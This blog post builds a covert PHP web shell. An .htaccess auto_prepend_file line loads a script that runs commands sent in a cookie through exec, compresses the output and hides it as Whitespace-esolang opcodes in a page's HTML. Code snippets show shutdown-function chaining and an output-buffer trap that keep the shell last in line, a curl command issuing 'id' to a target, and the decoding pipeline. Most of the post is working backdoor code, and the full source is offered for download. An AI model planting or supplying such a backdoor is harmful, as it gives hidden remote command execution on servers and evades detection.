Whitespace Esolang Covert Channel / Steganography
I’ve been always a fan of esoteric programming languages (esolangs). These programming languages are generally made just for fun, mostly in universities or for challenges. Wikipedia describes as the following:
An esoteric programming language (esolang, in short) is a programming language designed to test the boundaries of computer programming language design, as a proof of concept, or as a joke. The use of esoteric distinguishes these languages from programming languages that working developers use to write software.
You’ve probably seen some of the famous ones like brainfuck and shakespeare language. Some months ago I stumbled upon this funny one called “Whitespace“.
About Whitespace esolang
Whitespace is an esolang created by Edwin Brady and Chris Morris from the University of Durham in released in 2003. Their opcodes consists only of spaces, tabs and line-feeds. Interesting, huh?
Here’s a sample Hello, World! program in Whitespace (red = spaces, blue = tabs, black = VIM cursor):
This “feature” came into my mind as a very difficult pattern to detect through computational means since the language natively discards every other character permitting this language to be merged arbitrarily with any other text…. and even some code ;)
I’ve then remembered that HTML has cool workarounds with repeated spaces and tabs when it comes to parsing and rendering, so I could be able to inject Whitespace opcodes into HTML without breaking it and with minor rendering quirks.
So the weather was crappy, beer was over and I decided to make a covert shell with that.
Creating the covert shell
PHP is one of the most used languages in websites and power popular platforms like WordPress and MediaWiki. PHP has an output buffering system (ob_start
, ob_get_contents
etc) and a widely abused feature called auto_prepend_file
. These would be enough to setup my covert shell.
I quickly spawned two files, one .htaccess
to handle my shell injection via auto_prepend_file
(very known and old trick) and one wcc.php
to do the magic.
1
|
php_value auto_prepend_file "wcc.php"
|
This would ensure my shell works on almost any php page on the target acessible through the browser.
First thing I had to do was ensure that the I’ve got the output buffer after all other possible output buffer handlers had processed it. There’s quite a time since I left web developing but I did remembered about register_shutdown_function
that is used to, you know, register functions that will run before the script exits.
I could’ve stopped there, but I’ve wanted to prevent other register_shutdown_functions
to win the race and alter the output after I did, so I did some research and saw that if you call register_shutdown_function
from a register_shutdown_function
, it will have high chances of being the last shutdown function (unless other register_shutdown_function
did the same trick).
1
2
3
4
5
6
7
8
|
function wcc_init() {
# ... snip ...
# Register shutdown function that registers a
# shutdown function as last in chain ;)
# (unless another shutdown functions does the same)
register_shutdown_function('wcc_shutdown', $cmd_output);
}//end :: wcc_init
|
And further down…
1
2
3
|
function wcc_shutdown($whitespace_payload) {
register_shutdown_function('wcc_merge_output', $whitespace_payload); # register last ;)
}//end :: wcc_shutdown
|
That took care of ensuring that my wcc_merge_output
function will run at the very end of any script.
Now it’s time to play with the output buffer and do the whitespace magic. I’ve placed ob_start
on my wcc_init
function that is prepended by .htaccess
so as soon as script starts, output buffering is enabled.
If the magic cookie key is set, it will run the command with exec
(for testing purposes, you can change to whichever method you want), gzdeflate
-it and convert to whitespace language.
I won’t comment on the actual code responsible to converting from ASCII to Whitespace but FYI, it basically converts each char to binary, pushes each character to Whitespace Stack, then adds “print char from stack” N times, where N = len(string)
and finally adds the “end program” sentence.
You can read more about the internals of Whitespace Language on the official page’s tutorial. If you’re interested, you can check the wcc_whitespace_print_string
function source-code.
The wcc_init
function ended up looking like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
function wcc_init() {
if (
!isset($_COOKIE[WCC_COOKIE_KEY]) ||
empty($_COOKIE[WCC_COOKIE_KEY])
) return false;
ob_start();
$cmd_output = wcc_exec($_COOKIE[WCC_COOKIE_KEY]);
register_shutdown_function('wcc_shutdown', $cmd_output);
return true;
}//end :: wcc_init
|
When the original script finishes its job and execution is passed to my shutdown function, wcc_merge_output
will grab the contents of the output buffer, merge, display and exit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
function wcc_merge_output($whitespace_payload) {
$page_content = ob_get_contents();
ob_end_clean();
# "Sanitize" page content and tokenize
# ... snip ...
# Build Content
$final_content = wcc_build_content($whitespace_tokens, $content_tokens);
# Show content & exit
print $final_content;
exit(0);
}//end :: wcc_merge_output
|
The caveat
Of course, nothing comes easy. I decided to test the WCC on a real (little old) WordPress install so I pulled up an old VM that I had it installed.
My buffer was being ignored or duplicated, depending on the page. Turns out I did not account the race condition that other codes might introduce when handling output buffer and they were flushing the buffer before I could act, so I created a little trap to prevent others from messing with it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
# in script start
global $buffer;
# in wcc_init()
# this trap will be called when something
# tries to display the output buffer
ob_start("wcc_output_trap");
# Trap function added
# Someone tries to output the buffer before us
# and ... OMG! IT'S A TRAP!
function wcc_output_trap($current_buffer) {
global $buffer;
$buffer .= $current_buffer; # let's save it for later
return ''; # prevents showing the buffer yet
}//end :: wcc_output_trap
# in wcc_merge_output()
$page_content = $buffer.ob_get_contents(); # now we can show everything
|
As from the documentation for the callback
parameter from ob_start
:
The function will be called when the output buffer is flushed (sent) or cleaned (with ob_flush(), ob_clean() or similar function) or when the output buffer is flushed to the browser at the end of the request.
That did the trick.
The sanitization and tokenization process is quite simple.
For content, first I replace all tabs to spaces, place each line in an array with respective line number as index. Then I remove the linefeeds from the each line and break the line into tokens separated by spaces.
For whitespace, I just convert a string to an array of characters. Dead simple.
Merging content
This is quite simple also. For each whitespace token (character/opcode), I add one of the content parts (tokens) followed by the whitespace token.
If whitespace payload is less than content, when I finish adding whitespace tokens, I just add the remaining pieces glued toghether by spaces and keep their line feeds.
If whitespace payload is greater than content, I just add raw whitespace payload to the end of the HTML content. This brings up some issues on detection but it’s better than no output at all. Just choose a page with more content.
You can check it out the source-code of this routine.
Issuing requests to the shell
In this PoC I’ve used the classic Cookie
command input trick.
1
2
|
define('WCC_COOKIE_KEY', 'wcc_cmd');
$_COOKIE[WCC_COOKIE_KEY];
|
So through a shell, you can do something like
1
|
curl -s -H 'Cookie: wcc_cmd=id' http://10.1.1.100/wcc/ -o out.html
|
Then parse with any Whitespace interpreter and inflate the payload again
1
|
./wspace out.html | head -n -3 | php inflate.php
|
inflate.php
reads input from stdin
and passes to gzinflate
.
Result?
1
2
3
4
5
|
= WCC = Command output ==========================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
= WCC = EOF =====================================
|
Visual Differences
For some content you might get some quirks, for others, not.
Here’s a screenshot from both pages sources. First with embedded Whitespace command output and the second is the original.
Here’s a screenshot from both pages rendered HTML. First with embedded Whitespace command output and the second is the original. (Don’t mind the images, this theme has random header images)
Size discrepancies
Since we’re mostly changing stuff than adding, our file size ends up very close to the original if you have enought HTML to fit your command output. Below is the comparison of the original HTML with one with the output from some commands.
I’ve ran id
, ip a show
, ps aux
and ls -al
. id
was the only one that fit entirely in the HTML I’ve got (pretty short page). The others resulted in raw whitespace appended to the end of the original HTML.
1
2
3
4
5
6
|
$ ls -al /tmp/{original,cmd*}.html
-rw-rw-r-- 1 jseidl jseidl 14778 Feb 18 20:47 /tmp/original.html
-rw-rw-r-- 1 jseidl jseidl 14191 Feb 18 20:36 /tmp/cmd_id.html
-rw-rw-r-- 1 jseidl jseidl 16986 Feb 18 20:50 /tmp/cmd_ip_a_show.html
-rw-rw-r-- 1 jseidl jseidl 19013 Feb 18 20:50 /tmp/cmd_ls_al.html
-rw-rw-r-- 1 jseidl jseidl 41000 Feb 18 20:50 /tmp/cmd_ps_aux.html
|
LOL. In some cases it even “minifies” a little…
Final notes
- I did not put any effort on encoding/encrypting the cookie or commands or whatever. This is only to test the covert response channel.
- I also know that cookie based command passing is easily detectable. And are many other better ways to do that.
- Of course there are better methods than
exec
to run code. This is also not the point of this research.
Source code & files
All files are available on my github repo. Feel free to download, play, fork, whatever.